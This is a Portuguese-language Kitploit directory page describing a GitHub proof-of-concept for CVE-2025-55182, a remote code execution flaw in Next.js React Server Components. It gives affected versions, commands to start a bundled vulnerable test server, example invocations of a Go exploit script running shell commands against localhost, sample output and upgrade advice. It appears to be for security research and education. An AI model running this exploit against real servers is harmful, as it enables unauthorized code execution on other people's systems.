Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Prova de conceito de exploit para CVE-2025-55182, uma vulnerabilidade de execução remota de código (RCE) no Next.js via desserialização insegura em requisições RSC. Inclui um script POC baseado em Go e um servidor de teste vulnerável para pesquisa e educação em segurança. | Kitploit
Ferramentas/GitHubGitHub/hoosin/cve-2025-55182
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubhoosin/cve-2025-55182

CVE-2025-55182

Prova de conceito de exploit para CVE-2025-55182, uma vulnerabilidade de execução remota de código (RCE) no Next.js via desserialização insegura em requisições RSC. Inclui um script POC baseado em Go e um servidor de teste vulnerável para pesquisa e educação em segurança.

Ver Repositório
32há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Next.js RCE Guia de Reprodução

Aviso de Isenção

⚠️ Esta ferramenta é apenas para pesquisa de segurança e fins educacionais. Não a utilize para atividades ilegais. ⚠️

Introdução à Vulnerabilidade

CVE-2025-55182 é uma vulnerabilidade crítica de execução remota de código (RCE) no framework Next.js. A vulnerabilidade decorre de um problema de desserialização insegura no Next.js ao processar requisições de React Server Components (RSC). Um atacante pode executar código arbitrário no servidor sem autorização, criando requisições HTTP maliciosas.

Versões Afetadas:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • e algumas versões Canary

Configuração do Ambiente

Este projeto fornece um servidor de teste Next.js vulnerável chamado test-server.

1. Iniciar o Servidor de Teste

Certifique-se de que você tem Node.js e npm instalados.

root@kitploit:~
cd test-server
npm install
npm run dev

O servidor é executado por padrão em http://localhost:3000.

Nota: Se encontrar um erro de arquivo lock, tente executar:

root@kitploit:~
rm -f .next/dev/lock && npm run dev

Reprodução da Vulnerabilidade (POC)

Este projeto fornece um script POC em Go chamado poc.go.

Usando o Script Go

Uso:

root@kitploit:~
go run poc.go [URL alvo] [comando a executar]

Exemplos:

  1. Executar comando id (padrão)

    root@kitploit:~
    go run poc.go
    

    ou

    root@kitploit:~
    go run poc.go http://localhost:3000 id
    
  2. Listar arquivos do diretório atual

    root@kitploit:~
    go run poc.go http://localhost:3000 "ls -la"
    
  3. Exibir conteúdo do arquivo

    root@kitploit:~
    go run poc.go http://localhost:3000 "cat package.json"
    

Saída Esperada: Embora o código de status HTTP retorne 500, o resultado da execução do comando estará incluído no campo digest da resposta.

root@kitploit:~
1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

Recomendações de Correção

Atualize o Next.js para uma versão segura:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
root@kitploit:~
npm install next@latest react@latest react-dom@latest
Baixar ferramenta